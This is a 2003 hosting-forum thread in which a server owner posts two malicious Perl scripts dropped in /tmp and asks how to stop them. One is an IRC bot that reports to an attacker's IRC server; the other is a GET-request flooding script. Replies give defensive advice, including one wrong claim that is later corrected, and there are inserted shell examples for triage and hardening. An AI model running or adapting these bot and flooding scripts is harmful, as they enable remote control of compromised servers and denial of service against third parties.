The Community Forums


Suspicious file in /tmp dir

Discussion in 'General Discussion' started by shann, Jun 23, 2003.

  1. shann

    shann Well-Known Member

    Joined:
    Jul 5, 2002
    Messages:
    366
    Likes Received:
    0
    Trophy Points:
    16
    cPanel Access Level:
    Website Owner
    Hi All,

    I have got a suspicious file in our /tmp dir. This is the code they placed. Can anyone tell me how we could avoid these?



    #!/usr/bin/perl

    use IO::Socket;

    $ARGC=@ARGV;

    $serv=$ARGV[0];
    $chan=$ARGV[1];
    $botnick=$ARGV[2];


    $sock = IO::Socket::INET->new(
    PeerAddr => $serv,
    PeerPort => 6667,
    Proto => 'tcp' ) or die "****";

    while($line = <$sock>){
    print $line;

    sleep 3;
    print $sock "NICK $botnick\nUSER bot 0 0 :CCS bot\n";
    last;


    }

    while($line = <$sock>){
    print $line;
    #use next line if the server asks for a ping
    if($line =~ /^PING/){
    print $sock "PONG :" . (split(/ :/, $line))[1];
    }
    if($line =~ /(376|422)/i){
    print $sock "NICKSERV :identify nick_password\n";
    last;
    }
    }

    sleep 3;
    print $sock "JOIN #$chan\n";
    sleep 2;
    print $sock "PRIVMSG #$chan :elite hackbot connected\n";

    while ($line = <$sock>) {
    ($command, $text) = split(/ :/, $line); #$text is the stuff from the ping or the text from the server

    #1 shann, Jun 23, 2003
    Last edited: Jun 23, 2003
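Added example (not code from any poster in this thread): before deleting what turns up in /tmp, it is worth listing which files there look like dropped scripts so a copy can be kept for analysis. The function below, which assumes only a POSIX shell with find, head and grep, flags files that start with a "#!" interpreter line or that mention IO::Socket, the module the script quoted above uses to reach an IRC server. The sample files in the usage note are constructed.

```shell
#!/bin/sh
# Added example, not from the thread: list files in a directory that look like
# dropped scripts, so they can be preserved and examined before removal.
# A file is flagged when it begins with a "#!" line ("shebang") or mentions
# IO::Socket, as the IRC bot quoted in the first post does.
# Usage: triage_tmp /tmp
triage_tmp() {
    dir="$1"
    # -maxdepth 1 keeps the scan to the directory itself; raise it if the
    # dropped files are nested in subdirectories.
    find "$dir" -maxdepth 1 -type f 2>/dev/null | while IFS= read -r f; do
        reason=""
        # head -c 2 reads only the first two bytes, so large files are cheap to check.
        if [ "$(head -c 2 "$f" 2>/dev/null)" = "#!" ]; then
            reason="shebang"
        fi
        if grep -q 'IO::Socket' "$f" 2>/dev/null; then
            reason="${reason:+$reason,}IO::Socket"
        fi
        if [ -n "$reason" ]; then
            # One line per hit: reason(s), a tab, then the path.
            printf '%s\t%s\n' "$reason" "$f"
        fi
    done
}

# Constructed sample directory for a stand-alone run (not real /tmp contents).
demo_dir=$(mktemp -d)
printf '#!/usr/bin/perl\nuse IO::Socket;\n' > "$demo_dir/a.pl"
printf 'plain text\n' > "$demo_dir/notes.txt"
triage_tmp "$demo_dir"
rm -rf "$demo_dir"
```

Run it as root against /tmp and copy anything it reports to a directory outside /tmp (with its owner and timestamps, e.g. cp -p) before cleaning up; the owner of the file tells you which account or web application was used to write it.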
  2. sexy_guy

    sexy_guy Well-Known Member

    Joined:
    Mar 19, 2003
    Messages:
    848
    Likes Received:
    0
    Trophy Points:
    16
    I hope for your sake you had a firewall active when they dropped this in /tmp. It listens for incoming connections on port 6667, then all they have to do is log in through port 6667 and you are owned.

    If you didn't have a firewall you should probably check to make sure you haven't been rooted.

  3. shann

    shann Well-Known Member

    Joined:
    Jul 5, 2002
    Messages:
    366
    Likes Received:
    0
    Trophy Points:
    16
    cPanel Access Level:
    Website Owner
    Thanks for your reply. Can you recommend some good firewall?

    Thanks sexyguy

  4. sexy_guy

    sexy_guy Well-Known Member

    Joined:
    Mar 19, 2003
    Messages:
    848
    Likes Received:
    0
    Trophy Points:
    16
    So you didn't have a firewall? I'm using Bastille. You better download chkrootkit, compile it and run it and look for signs of a rootkit. And you better close port 6667 soon. Again I really question cPanel security here. This is now the third drop into /tmp that I've seen in a week, so my question would be: what is being done about this?

  5. hostcp3

    hostcp3 Well-Known Member

    Joined:
    Jun 18, 2002
    Messages:
    156
    Likes Received:
    0
    Trophy Points:
    16
    *Please note*

    No liability taken for errors, faults or issues which come from using the information posted here.


    touch a file in /etc/cron.hourly or /etc/cron.daily and call it

    rmtmp.sh


    edit the file and paste this into it:

    pushd /tmp;rm -r `ls | grep -v horde.log | grep -v lost+found | grep -v mysql.sock`;popd


    Let it run. Just a warning: it does interfere a little with Horde and other programs which use session IDs.

    run it daily if you like.
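Added example (not hostcp3's script): the one-liner above expands the output of ls, so a file name containing a space or a glob character is split or expanded before rm sees it, and it also removes every file regardless of age, which is why it breaks live Horde sessions. The version below, which assumes only POSIX find and rm, keeps the same exclusions but deletes only entries older than a given number of days and never touches sockets. The directory in the usage note is constructed.

```shell
#!/bin/sh
# Added example, not from the thread: age-based /tmp cleanup using find, so
# odd file names are handled safely and recent files (live sessions) survive.
# Usage: clean_tmp /tmp 1   -> remove entries not modified in the last day
clean_tmp() {
    dir="$1"
    days="${2:-1}"
    # -mindepth/-maxdepth 1: only direct children of $dir, never $dir itself.
    # ! -type s: leave Unix sockets such as mysql.sock alone whatever their name.
    # -mtime +N: only entries whose modification time is more than N days old.
    # -exec ... {} +: rm receives the paths as separate arguments, no word splitting.
    find "$dir" -mindepth 1 -maxdepth 1 \
        ! -type s \
        ! -name 'horde.log' ! -name 'lost+found' ! -name 'mysql.sock' \
        -mtime +"$days" \
        -exec rm -rf -- {} +
}

# Constructed demo on a throwaway directory (not real /tmp contents).
demo_dir=$(mktemp -d)
touch "$demo_dir/fresh.txt"
touch "$demo_dir/old script.pl"
touch -t 200301010000 "$demo_dir/old script.pl"   # backdate so it qualifies
clean_tmp "$demo_dir" 1
ls -la "$demo_dir"
rm -rf "$demo_dir"
```

Treat this as housekeeping, not as a defence: a modification time is trivial to set, so a dropped script can be made to look fresh, and the files should be triaged and their origin traced before any cleanup runs.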

  6. jamesbond

    jamesbond Well-Known Member

    Joined:
    Oct 9, 2002
    Messages:
    738
    Likes Received:
    1
    Trophy Points:
    18
    If you have mounted /tmp as noexec nosuid (you really have to do this yourself obviously) it will be difficult for someone to execute the script.

    httpd chroot would be nice of course :)
    What actually happened to the development of httpd chroot:


    For now, mounting /tmp as noexec nosuid, changing permissions on compilers to root only, blocking unused ports and of course having your server software up to date will make it very difficult for people to succeed with these /tmp attacks.

    With php you could set each user to use the /tmp in their home directory, instead of the /tmp directory everyone uses. I'm not sure what the advantage would be though, except for the fact that all php sessions are not stored in the 'general' /tmp anymore
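Added example (not code from any poster in this thread): a quick way to verify the noexec/nosuid advice above is actually in effect, by reading /proc/mounts (or the output of mount) and checking the option field of the /tmp entry. The function assumes only a POSIX shell and awk; the fstab line in the comment uses a placeholder device name. It also reports the case shann describes later in the thread, where /tmp is not a separate mount at all, since mount options cannot apply then.

```shell
#!/bin/sh
# Added example, not from the thread: report whether a mount point carries the
# noexec and nosuid options. Input is /proc/mounts-style text on stdin:
#   device mountpoint fstype options dump pass
# A separate /tmp partition gets these options from an fstab line such as
#   /dev/sdXN  /tmp  ext3  defaults,noexec,nosuid,nodev  0 2   (device is a placeholder)
# Returns 0 only when both options are present; prints what is missing otherwise.
# Usage: tmp_mount_hardened /tmp < /proc/mounts
tmp_mount_hardened() {
    mp="$1"
    # Option field of the line whose mount point matches exactly.
    opts=$(awk -v mp="$mp" '$2 == mp { print $4 }')
    if [ -z "$opts" ]; then
        echo "$mp: not a separate mount, noexec/nosuid cannot apply"
        return 1
    fi
    missing=""
    for want in noexec nosuid; do
        # Wrap in commas so "noexec" does not match inside another option name.
        case ",$opts," in
            *",$want,"*) ;;
            *) missing="$missing $want" ;;
        esac
    done
    if [ -n "$missing" ]; then
        echo "$mp: missing$missing"
        return 1
    fi
    echo "$mp: noexec,nosuid set"
    return 0
}

# Constructed sample input for a stand-alone run (not a real /proc/mounts).
SAMPLE_MOUNTS='/dev/sda1 / ext3 rw 0 0
/dev/sda3 /tmp ext3 rw,noexec,nosuid 0 0'
printf '%s\n' "$SAMPLE_MOUNTS" | tmp_mount_hardened /tmp
```

On a real host run it as tmp_mount_hardened /tmp < /proc/mounts. Where /tmp is not its own partition, the same options can still be applied by mounting a file-backed loopback filesystem on /tmp; remember that noexec only stops direct execution, so a script run as "perl /tmp/file" still runs, which is why the advice above pairs it with restricting compilers and keeping software patched.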

  7. VHDave

    VHDave Registered

    Joined:
    Feb 19, 2003
    Messages:
    3
    Likes Received:
    0
    Trophy Points:
    1
    sexy_guy: That is absolutely incorrect. The script connects to the IRC server at the hostname and port specified (ARGV parameters via command prompt or other method of execution). It does not in any manner listen to port 6667 on your server. Having a firewall blocking incoming connections to port 6667 would be useless.

  8. shann

    shann Well-Known Member

    Joined:
    Jul 5, 2002
    Messages:
    366
    Likes Received:
    0
    Trophy Points:
    16
    cPanel Access Level:
    Website Owner
    Hi,

    The thing is they keep putting files in the /tmp dir and executing them, making our server go down.

    This is the latest code they placed. How could I avoid this? We don't have a separate partition for the /tmp dir.

    This is the latest code they placed and our server went down.

    #!/usr/bin/perl

    use IO::Socket;

    $ARGC=@ARGV;

    $serv=$ARGV[0];


    $sock = IO::Socket::INET->new(
    PeerAddr => $serv,
    PeerPort => 80,
    Proto => 'tcp' ) or die "****";

    system("perl get.pl $serv &");
    system("perl get.pl $serv &");


    while(1){
    print $sock "GET\n";
    }


    Any help.
    Thanks
